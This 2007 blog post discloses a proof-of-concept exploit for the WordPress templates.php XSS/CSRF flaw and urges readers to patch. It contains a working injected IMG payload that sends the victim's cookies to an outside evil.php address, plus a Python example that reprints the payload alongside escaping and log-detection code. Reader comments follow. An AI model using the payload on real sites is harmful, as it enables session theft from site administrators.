Wordpress template.php Exploit

Update (16/01): see http://michaeldaw.org/projects/wpsec/

It's been a few days since the release of:
http://michaeldaw.org/md-hacks/wordpress-persistent-xss/.

Other references:

Time to release a proof of concept exploit for this. I am sure the crackers will already be exploiting this in the wild.

If you remember from my original advisory, our attack was limited because the injected value is passed through PHP's basename function, which discards everything up to the last forward slash, so the payload itself cannot contain a "/". To get around this we borrow the characters we need from document.location. I wanted an exploit that was simple and compact.

I created two HTML files to aid in my research, Inject.html and Recover.html.

First: Inject.html

This is our actual exploit (we use a nested IMG exploit):

<img src='https://wordpress-site/wp/wp-admin/templates.php?file=<img src=%27%27 onerror="javascript:
    var s=(document.location.toString().charAt(6));
    var url=(%27http:%27%2Bs%2Bs%2B%27michaeldaw.org%27);
    document.location=url%2Bs%2B%27evil.php?%27%2Bdocument.cookie">'>

Second: Recover.html

If we mess up we may create an annoying, persistent redirect that prevents us from accessing the templates.php file. So this next HTML file simply resets our templates.php file using the same injection point.

<img src="https://wordpress-site/wp/wp-admin/templates.php?file=a">
<img src="https://wordpress-site/wp/wp-admin/templates.php?file=b">
<img src="https://wordpress-site/wp/wp-admin/templates.php?file=c">
<img src="https://wordpress-site/wp/wp-admin/templates.php?file=d">
<img src="https://wordpress-site/wp/wp-admin/templates.php?file=e">
<img src="https://wordpress-site/wp/wp-admin/templates.php?file=f">

Job done; all that is required is for an attacker to set up a file on a remote server to capture the cookies.
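Two things from the description above are worth seeing in working code from the defender's side: why the basename() step does not neutralise the payload (it only removes directory components, which is exactly why the exploit fetches its slashes from document.location), and what does neutralise it, namely escaping the value on output. The following Python is an added example, not code from the original post or from WordPress; the render functions are a hypothetical model of the reflected page, the log format and every sample value are constructed, and the suspicious-pattern list is an assumption for illustration.

```python
"""Added example (not part of the original post, and not WordPress code): a
model of why passing the `file` parameter through PHP basename() does not
neutralise the templates.php injection, the output escaping that does, and a
small check that flags the pattern in access logs.  The rendering functions,
the log format and every sample value below are constructed for illustration."""
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The decoded `file` value from the post's Inject.html.  It contains no '/'
# at all: the redirect URL's slashes are fetched at run time with
# document.location.toString().charAt(6), which is exactly why basename()
# does not break it.
PAYLOAD = (
    "<img src='' onerror=\"javascript:"
    "var s=(document.location.toString().charAt(6));"
    "var url=('http:'+s+s+'michaeldaw.org');"
    "document.location=url+s+'evil.php?'+document.cookie\">"
)


def php_basename(path: str) -> str:
    """Rough emulation of PHP basename(): keep only the text after the last
    '/'.  It strips directory components and nothing else, so '<', quotes
    and '=' pass straight through."""
    return path.rstrip("/").rsplit("/", 1)[-1]


def render_vulnerable(file_param: str) -> str:
    """Hypothetical pre-patch behaviour: basename() is applied and the result
    is echoed straight into an HTML attribute without escaping."""
    name = php_basename(file_param)
    return f"<input type='text' name='file' value='{name}'>"


def render_hardened(file_param: str) -> str:
    """Same page with the value HTML-escaped on output (quote=True also
    escapes the single quote that delimits the attribute)."""
    name = html.escape(php_basename(file_param), quote=True)
    return f"<input type='text' name='file' value='{name}'>"


# ---- access-log check -------------------------------------------------

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Fragments that should never appear in a theme file name (assumed list).
SUSPICIOUS_RE = re.compile(r"<|>|onerror|onload|javascript:", re.IGNORECASE)


def suspicious_file_param(log_line: str) -> bool:
    """True when a request to templates.php carries a `file` value containing
    markup or script fragments.  parse_qs already decodes once; the value is
    decoded a second time so a double-encoded %253C is caught as well."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    target = urlsplit(m.group(1))
    if "templates.php" not in target.path:
        return False
    values = parse_qs(target.query).get("file", [])
    return any(SUSPICIOUS_RE.search(unquote(v)) for v in values)


def scan_log(lines):
    """Return the indexes of the suspicious lines."""
    return [i for i, line in enumerate(lines) if suspicious_file_param(line)]


# Constructed combined-log lines: a normal theme edit, an injection attempt,
# and an unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Jan/2007:10:00:01 +0000] "GET /wp/wp-admin/templates.php?file=style.css HTTP/1.1" 200 5120',
    '203.0.113.5 - - [02/Jan/2007:10:00:02 +0000] "GET /wp/wp-admin/templates.php?file=%3Cimg%20src=%27%27%20onerror=%22alert(1)%22%3E HTTP/1.1" 200 5120',
    '198.51.100.7 - - [02/Jan/2007:10:00:03 +0000] "GET /wp/index.php HTTP/1.1" 200 20480',
]


if __name__ == "__main__":
    print("basename keeps the payload intact:", php_basename(PAYLOAD) == PAYLOAD)
    print("vulnerable:", render_vulnerable(PAYLOAD))
    print("hardened:  ", render_hardened(PAYLOAD))
    print("suspicious log lines:", scan_log(SAMPLE_LOG))
```

Run it and the hardened output shows the payload rendered as inert text inside the attribute, while the vulnerable output contains a live nested tag; the log scan flags only the second constructed line. The escaping is the fix that matters: a file-name allow-list on input (letters, digits, dot, dash, underscore) is a good second layer, but output escaping is what closes the injection regardless of what basename() lets through.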

Conclusion

I hope this article “strongly” encourages WordPress users to apply the latest patch ASAP! Another attack vector I was thinking of was injecting PHP code straight into the WordPress Installation. I can see really bad worm potential with this vulnerability. I stress again, apply the patch.

40 Comments so far

  1. […] It looks like there has been, for three days now, a so-called WordPress Template.PHP HTML Injection Vulnerability that allows an attacker to execute code on the site. Anyone who wants to look at the proof of concept exploit should go to Michael Daw's site and do so there. […]

  2. […] As a note, if you want to see a proof of concept regarding this WordPress issue, you can go to David Kierznowski's homepage and see it for yourself […]

  3. Buayacorp @ January 2nd, 2007

    Cross Site Scripting (XSS) in WordPress…

    Note: This post was written after reporting the flaws to the WordPress development team.

    Yesterday I reported two security flaws in WordPress that allow XSS against sites that use WordPress as their platform…

  4. Ashish Mohta @ January 2nd, 2007

    I have updated the patch… but how do I know it works fine? I mean, is there a test that can be done?

    Moreover, the changes done, are they tested for integrity, i.e. that it works properly with WordPress as a whole…

    I was not sure if it's the right place to ask, but I think you are the right person for that.

    Thx and Regards
    Ashish

  5. david.kierznowski @ January 2nd, 2007

    Ashish: I’m not the right person to ask; however, the patch (http://trac.wordpress.org/changeset/4665) should not break anything but obviously be cautious and make sure you have done backups before you try anything.

    At a minimum I would at least make a copy of the original templates.php file in case you notice it stuffing something up later. Yes, it can be tested. This post discusses the exploit. You can email me if you require additional information.

    DK

  6. […] [Source] […]

  7. Ashish Mohta @ January 2nd, 2007

    Thx David,

    I have applied the patch and will see how it goes. Had made a backup too.

    Thx for the discovery. I will be a regular reader of your blog now.

  8. david.kierznowski @ January 2nd, 2007

    Ashish, you're welcome.

  9. […] Download templates.php Unified Diff | Zip Archive Via michaeldaw.org [Thanks Ashish] […]

  10. […] [Source] […]

  11. […] Read more about this exploit on Operation N or Security Focus […]

  12. TechnoBeta Blog @ January 2nd, 2007

    […] To learn more about this vulnerability, visit Operation N or Security Focus. Report via Tech-Buzz. […]

  13. Ashish Mohta @ January 2nd, 2007

    Hi,

    Just wanted to ask, can you add the link to the official announcement from WordPress regarding this matter in this post? I was unable to find it.

  14. […] Posted by adam k on January 2nd, 2007 David Kierznowski has uncovered an exploit in the popular Wordpress blogging software that everyone should be aware of. Popular security website Security Focus has the issue documented, and it is suggested that you upgrade your template.php file as soon as possible to avoid becoming a victim. The Wordpress team has issued an updated release, version 2.0.6 that contains a fix. Simply put, to fix the wordpress exploit, visit the wordpress site and edit line 114 in your template.php file. […]

  15. david.kierznowski @ January 2nd, 2007

    Ashish, I don’t think there was an official announcement. A fix was provided as listed above. Nothing more was said as far as I know.

    This “type” of vulnerability (CSRF) has only recently been gaining popularity. I don’t think many people understand its dangers.

  16. Ashish Mohta @ January 2nd, 2007

    You are right. I had been asking all the bloggers about this, but hardly anybody knows. Most probably it was the holiday period and nobody looked back.

  17. Garry Conn @ January 3rd, 2007

    Hey guys,

    I appreciate all the work that has been put into correcting this problem. Thilak at TechBuzz wrote a post that references this article here. I am curious though why Wordpress.org hasn’t published anything regarding this? I checked their official blog and nothing has been posted. Do you think that they know about this problem? If they do, then are they planning to release their own patch? Either case, I will download and get my site fixed. Thanks a lot…

    - Garry

  18. […] If your blog is using WordPress version 2.0.5 or below, that means you are exposed to hacker attack via the cross-site scripting vulnerability that has been found. What a hacker needs to do is just inject some script or HTML code into your WordPress wp-admin/template.php file. To learn more about how a hacker can do that, you can read Operation N and Security Focus. […]

  19. Perfect Blogger @ January 3rd, 2007

    Security Alert: templates.php XSS vulnerability in WordPress…

    Thanks to Thilak of TechBuzz, I've just learned that wp-admin/templates.php (part of your WordPress administration functionality) seems to be vulnerable to a rather nasty XSS exploit.

    ……

  20. david.kierznowski @ January 3rd, 2007

    Garry, WordPress has been informed (hence the patch for v2.0.5). They have also let me know that it will be corrected in WordPress 2.0.6. I do not know why they did not publish an advisory (see my previous comments for possible reasons).

  21. […] wordpress-templatephp-exploit […]

  22. […] You can read more about this exploit on Security Focus and Operation n. […]

  23. […] Several blogs reported today on a security vulnerability of the XSS (Cross-Site Scripting) type discovered in the templates.php file located inside the wp-admin directory. […]

  24. […] You can get more details and updates of this threat from Operation n and Technospot.net […]

  25. […] Via the feed reader several reports came in that there is an important upgrade for WordPress. This upgrade must really be important, because the next new version, WordPress 2.1, is already in the starting blocks. Everyone is advised to upgrade to WordPress 2.06 as soon as possible. This upgrade is expected to fix the recently reported WordPress template.php exploit. This is the first time I have heard of this leak… […]

  26. […] A few days ago a security flaw was detected in one of the WordPress files (template.php to be precise). Apparently the problem was serious, according to the experts, who had immediately proposed a patch for the file in question! […]

  27. […] Filed under: Blogs, Bloggers & Blogging, Software, WordPress. WordPress 2.0.6, "a security release version with an important security fix", has been released. It's a recommended version that everyone should upgrade to, and it probably may also have addressed the exploit discovered in WordPress Template.php. […]

  28. […] An important upgrade, WordPress 2.0.6, has been released; it includes an important security fix and they recommend everyone upgrade their WordPress installations. I guess this release fixes the recently reported WordPress template.php Exploit, which had WordPress users confused about applying patches. Some of the important features in the release are […]

  29. Pixelomanie » Upgrade party @ January 8th, 2007

    […] A few days ago a security flaw was detected in one of the WordPress files (template.php to be precise). Apparently the problem was serious, according to the experts, who had immediately proposed a patch for the file in question! […]

  30. Personally, I never use more than a single link in the comment I post because doing so can trigger spam catchers if the user has that plugin activated, whereas a single link will not.

  31. […] this release fixes the recently reported Wordpress template.php Exploit, which had WordPress users confused about applying patches. Thanks to Ashish Mohta for this […]

  32. Alireza @ May 16th, 2007

    I'm using ver 2.0.5 and patched the template.php, but after patching I can't edit my files via the web.
    Any suggestion?

  33. david.kierznowski @ May 16th, 2007

    Alireza, that's quite an old version; I think you may have more security problems than just the template.php vulnerability. I would recommend you make a backup and then upgrade to the latest version.

  34. Betty @ May 18th, 2007

    Good site! Good resources here, I will bookmark!

    Thanks, bye!

  35. SEO @ June 1st, 2007

    Very good information. Thank you and keep up the good work.

  36. […] Template CSRF Vulnerability (more) […]

  37. […] this release fixes the recently reported Wordpress template.php Exploit, which had WordPress users confused about applying patches. Thanks to Ashish Mohta for this […]

  38. Suchmaschinenoptimierung @ October 18th, 2007

    Thanks for the useful content. Keep on writing such good stuff!
